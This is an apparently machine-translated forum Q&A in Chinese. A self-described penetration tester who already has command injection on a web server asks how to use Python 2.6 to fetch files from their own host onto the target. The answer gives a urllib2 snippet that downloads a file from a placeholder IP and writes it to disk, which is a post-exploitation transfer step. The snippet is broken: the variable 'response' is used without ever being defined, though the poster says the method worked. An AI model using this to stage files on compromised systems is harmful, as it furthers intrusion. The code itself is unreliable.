我正在寻找Python脚本的帮助。
我正在做一个pentesting项目,并获得了在具有有限权限的系统wwwroot目录中执行命令注入和写入文件的权限。 ftp和telnet都在系统上,但我没有权限。在这一点上真正有用的一件事是Python26,它在系统上,我可以使用。 虽然我的Python知识很少。
我的想法是......有没有办法使用Python脚本回调我的主机并从我的主机上获取文件?如果是这样,有没有人有关于如何编写脚本的指示?
提前致谢。
答案 0 :(得分:0)
import urllib2
file = "success2.txt"
url = "http://xx.xx.xx.xx/test.txt"
fh = open(file, "w")
fh.write(response.read())
fh.close()
所以这就是我在@furas建议之后最终做的事情。
我做了更多的研究,发现: http://www.pythonforbeginners.com/python-on-the-web/how-to-use-urllib2-in-python/
很好地解释了它。
希望这有助于将来。
据我了解代码。 您首先设置变量“file”,这是您要写入的内容(绝对路径可能对远程使用很重要) 然后设置文件所在的URL和文件名
代码然后写入文件。然后它从网址写入它打开的文件。
与ftp不同,这似乎不直接“复制”文件。所以你可能需要在fh = open(文件,“w”)中使用“wb”来执行二进制操作。我不是100%w和wb之间的区别,但这种方法对我有用。